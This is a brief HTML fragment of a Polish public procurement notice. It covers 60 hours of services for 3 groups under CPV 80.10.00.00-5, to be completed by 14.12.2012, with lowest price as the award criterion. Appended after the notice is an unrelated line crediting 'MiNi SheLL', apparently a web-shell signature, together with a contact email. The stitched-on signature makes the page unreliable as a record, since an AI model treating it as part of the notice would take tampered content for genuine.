<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dla 3 grup, łącznie 60 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com